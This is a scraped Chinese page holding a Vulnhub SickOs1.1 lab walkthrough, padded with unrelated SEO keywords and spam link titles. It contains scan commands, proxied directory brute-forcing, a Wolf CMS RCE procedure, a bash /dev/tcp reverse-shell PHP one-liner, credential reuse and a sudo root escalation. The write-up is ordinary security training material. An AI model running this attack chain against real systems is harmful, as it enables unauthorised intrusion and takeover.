当前位置: 首页 > news >正文

wordpress母公司seo学校培训班

wordpress母公司,seo学校培训班,苏州网页优化服务,wordpress 插件中心SickOs1.1靶机笔记 概述 Vulnhub的靶机sickos1.1 主要练习从互联网上搜取信息的能力#xff0c;还考察了对代理使用#xff0c;目录爆破的能力#xff0c;很不错的靶机 靶机地址#xff1a; 链接: https://pan.baidu.com/s/1JOTvKbfT-IpcgypcxaCEyQ?pwdytad 提取码: yt…SickOs1.1靶机笔记 概述 Vulnhub的靶机sickos1.1 主要练习从互联网上搜取信息的能力还考察了对代理使用目录爆破的能力很不错的靶机 靶机地址 链接: https://pan.baidu.com/s/1JOTvKbfT-IpcgypcxaCEyQ?pwdytad 提取码: ytad 一、nmap扫描 1主机发现 sudo nmap -sn 192.168.111.0/24MAC Address: 00:50:56:FA:CB:D3 (VMware) Nmap scan report for 192.168.111.11 Host is up (0.00018s latency).看到靶机地址是192.168.111.11 2端口扫描 sudo nmap -sT --min-rate 10000 -p- 192.168.111.11 -o portsStarting Nmap 7.93 ( https://nmap.org ) at 2024-09-28 12:35 CST Nmap scan report for 192.168.111.11 Host is up (0.00056s latency). Not shown: 65532 filtered tcp ports (no-response) PORT STATE SERVICE 22/tcp open ssh 3128/tcp open squid-http 8080/tcp closed http-proxy MAC Address: 00:0C:29:DA:7A:E1 (VMware)Nmap done: 1 IP address (1 host up) scanned in 13.44 seconds3详细信息 sudo nmap -sT -sV -sC -O -p22,3128,8080 192.168.111.11 -o detailsStarting Nmap 7.93 ( https://nmap.org ) at 2024-09-28 12:37 CST Nmap scan report for 192.168.111.11 Host is up (0.00044s latency).PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 093d29a0da4814c165141e6a6c370409 (DSA) | 2048 8463e9a88e993348dbf6d581abf208ec (RSA) |_ 256 51f6eb09f6b3e691ae36370cc8ee3427 (ECDSA) 3128/tcp open http-proxy Squid http proxy 3.1.19 |_http-title: ERROR: The requested URL could not be retrieved |_http-server-header: squid/3.1.19 | http-open-proxy: Potentially OPEN proxy. |_Methods supported: GET HEAD 8080/tcp closed http-proxy MAC Address: 00:0C:29:DA:7A:E1 (VMware) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 17.98 seconds看到3128和好像是个squid代理服务器8080好像是关闭的代理服务 4默认脚本扫描 sudo nmap --scriptvuln -p22,3128,8080 192.168.111.11 -o vulnStarting Nmap 7.93 ( https://nmap.org ) at 2024-09-28 12:40 CST Nmap scan report for 192.168.111.11 Host is up (0.00051s latency).PORT STATE SERVICE 22/tcp open ssh 3128/tcp open squid-http 8080/tcp closed http-proxy MAC Address: 00:0C:29:DA:7A:E1 (VMware)Nmap done: 1 IP address (1 host up) scanned in 11.35 seconds没什么信息 二、web渗透 打开网页看看 介绍一下 Squid cache简称为Squid是一个流行的自由软件GNU通用公共许可证的代理服务器和Web缓存服务器。Squid有广泛的用途从作为网页服务 器的前置cache服务器缓存相关请求来提高Web服务器的速度到为一组人共享网络资源而缓存万维网域名系统和其他网络搜索到通过过滤流量帮助网络 安全到局域网通过DL上网。Squid主要设计用于在Unix一类系统运行。 看来他应该就是一个代理服务器但这里访问页面报错了 看看8080端口 看来8080不允许我们连接可能是他做了ip的一些限制。 我们是不是可以通过3128的代理来访问8080端口呢尝试一下 看到不行 但是我们可以访问80端口了 BLEHHH是网络口语表示很烦很郁闷厌恶的意思 我们做目录爆破吧 sudo gobuster dir -u http://192.168.111.11 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --proxy http://192.168.111.11:3128Gobuster v3.6 by OJ Reeves (TheColonial) Christian Mehlmauer (firefart)[] Url: http://192.168.111.11 [] Method: GET [] Threads: 10 [] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [] Negative Status codes: 404 [] Proxy: http://192.168.111.11:3128 [] User Agent: gobuster/3.6 [] Timeout: 10sStarting gobuster in directory enumeration mode/index (Status: 200) [Size: 21] /connect (Status: 200) [Size: 109] /robots (Status: 200) [Size: 45] /server-status (Status: 403) [Size: 295] Progress: 220560 / 220561 (100.00%)Finished打开看看 有一个wolfcms路径 而connect是一个文件 cat connect.py #!/usr/bin/pythonprint I Try to connect things very frequently\n print You may want to try my services通过这些发现我们现在就可以访问一下wolfcms 查找历史漏洞 searchsploit wolf看到一个RCE漏洞 searchsploit wolf -m 51421# Exploit Title: Wolf CMS 0.8.3.1 - Remote Code Execution (RCE) # Date: 2023-05-02 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://wolf-cms.readthedocs.io # Software Link: https://github.com/wolfcms/wolfcms # Version: 0.8.3.1 # Tested on: Kali Linux### Steps to Reproduce #### Firstly, go to the Files tab. # Click on the Create new file button and create a php file (e.g: shell.php) # Then, click on the file you created to edit it. # Now, enter your shell code and save the file. # Finally, go to https://localhost/wolfcms/public/shell.php### Theres your shell! ###他说有个files选项可以使我们上传php脚本应该是管理员的功能 我们现在需要知道后台管理页面的路径可以google搜索 看到 2. Proof of ConceptA)Login as regular user ( who have access upload functionality )B)Go to this page - http://targetsite.com/wolfcms/?/admin/plugin/file_manager/browse/C)Select upload an file option to upload Arbitary File ( filename ex: hello.php )D)Now you can access the file by here - http://targetsite.com/wolfcms/public/hello.php应该就是admin了 尝试弱口令admin:admin成功登陆 三、获得立足点 根据上述RCE的文本操作上传php反弹shell文件进而获得立足点 准备反弹shell文件 echo -e ?php system(\bash -c bash -i /dev/tcp/192.168.111.10/4444 01\); ? rev.php上传成功 我们在kali里开启监听去puplic目录下访问上传的rev.php文件 http://192.168.111.11/wolfcms/public/成功获得立足点 四、提权 在文件中查找 cat /var/www/wolfcms/wolf/plugins/backup_restore/views/settings.php catcd /home www-dataSickOs:/home$ ls ls sickos都看到了pass的字样尝试口令复用看一下这个密码是不是ssh的 root:pswpsw123 sickos:pswpsw123 root:john123 sickos:john123 我们们成功获得了sickos的用户权限 看到sickos用户拥有所有的sudo权限 启动一个新会话到root sudo /bin/bash -prootSickOs:/root# ls a0216ea4d51874464078c618298b1367.txt rootSickOs:/root# cat a0216ea4d51874464078c618298b1367.txt If you are viewing this!!ROOT!You have Succesfully completed SickOS1.1. Thanks for Trying 成功提权 总结 通过nmap扫描发现了squid代理服务设置代理做目录爆破发现了wolfcms利用google搜索找到了它的后台管理页面通过弱口令admin:admin成功登陆进入后台管理页面 利用后台的上传文件功能上传php脚本成功获得了立足点在该网站翻找配置信息找了几组凭证尝试口令服用获得了sickos用户的权限进而提权到了root
http://www.hkea.cn/news/14404940/

相关文章:

  • 设计网站官网wordpress快速安装
  • 国外设计最漂亮的网站wordpress安装是什么
  • 乐从容桂网站建设网站建设公司 选中企动力公司
  • 天长街道两学一做网站网站建设与管理升学就业方向
  • 农八师建设兵团社保网站阿里云服务器 wordpress
  • 小区服务网站怎么做咸阳做网站排名
  • 深圳建设局网站首页阿里云服务器网站建设
  • 网站做一个多少钱招聘网最新招聘信息网
  • linux建站和wordpress广州数商云
  • 网站优化潍坊目前网站是做响应式的好吗
  • 如何查看网站服务器类型win10优化大师
  • 海丰县建设局网站广东网页制作推广
  • 服装网站建设环境分析深圳国内网站建设
  • 动漫网站怎么做好玩的页游
  • 青岛贸易公司 网站制作网页制作简单
  • 百度做商务网站多少钱黄页88网站关键词怎么做
  • 做网站建设一年能赚多少钱浏览器打开网站404
  • 徐州网站建设公司官网蓝色风格企业网站模板
  • 园区网互联及网站建设昭通网站建设兼职
  • 微网站预约网站开发在线医疗网站建设
  • 如何挖掘和布局网站关键词网站建设的费用记什么科目
  • 宿松做网站宝安中心区房价
  • 在线医疗网站建设为什么网站关键词没有排名
  • 找外包公司做网站的好处和坏处google广告在wordpress
  • 大英县住房和城乡建设局网站企业网络维护
  • 房地产网站建设招商网站程序0day
  • 房地产网站系统湛江建站程序
  • 建设一个网站需要哪些方面的开支网站设计版权
  • 网站登录验证码显示不出来绵阳 网站设计
  • 企业网站建设需注意点济南建站培训